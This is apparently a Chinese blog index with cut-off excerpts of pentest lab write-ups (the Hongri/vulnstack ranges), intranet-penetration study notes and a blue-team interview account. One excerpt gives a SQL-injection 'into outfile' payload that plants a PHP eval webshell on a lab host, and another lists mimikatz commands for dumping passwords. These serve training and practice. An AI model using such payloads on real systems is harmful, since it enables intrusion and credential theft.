红日靶场一的wp
前言最近终于不是很忙了,抽时间复现了一下红日的靶场,一方面是熟练技术,另一方面争取在练习中填充自己的知识库。本人菜鸡,只是记录一下复现过程,大佬勿喷。参考文章最近在关注whoami大佬的内网渗透相关文章,本篇也是复现之一。https://www.freebuf.com/articles/network/242277.htmlhttps://www.freebuf.com/articles/web
红日靶场七-内网渗透练习
前言这个靶场是红日的ATT&CK实战系列-红队评估(七)目前此靶场已在vulnstack开源,下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/第一次玩三层内网靶场,有很多技术属于自己的知识盲区,经过这次练习,一边学习技术一边练手WP参考链接(本文涉及到侵权请联系删除):https://www.freebuf.com/art
内网渗透作业笔记下
1、远程连接主机2、进入之前搞到的目标主机10.0.1.83、猕猴桃mimikatz抓取密码logprivilege::debugsekurlsa::passwords发现用户密码被加密,域控权限很高,任何的成员机器都可以登录只需要 域名\域控的管理员账号 + 密码我们的目标就是找到域控主机计算机的认证,不是根据原始密码认证,根据秘文认证明文(加密算法)->密文4、找域控主机net u
内网渗透作业笔记上
1、报错爆出路径2、当知道绝对路径时,且可以导出权限开启的时候就可以拿到Webshell,利用out file 写入数据库http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,’<?php eval($_REQUEST[8])?>’ into outfile ‘c:/phpstudy/www/125.php’3、测试webshell是否
HW蓝队面试分享
这几天一直在看相关hw资料,把课程的技术内容都看了几遍,但是突然接到hw面试还是有些慌。简单分享一下面试内容。问:做过资产梳理嘛您说的是信息搜集这块嘛问:类似于信息收集主要就是对目标站点找真实Ip、子域名 、旁站、什么系统、开放的端口、服务这些问:用过什么工具呢nmap、hydra密码爆破、nessus等(突然有点懵,其他的没想起来)面试小姐姐也是可能有点忙,就直接问下一个问题了问:那网页显示50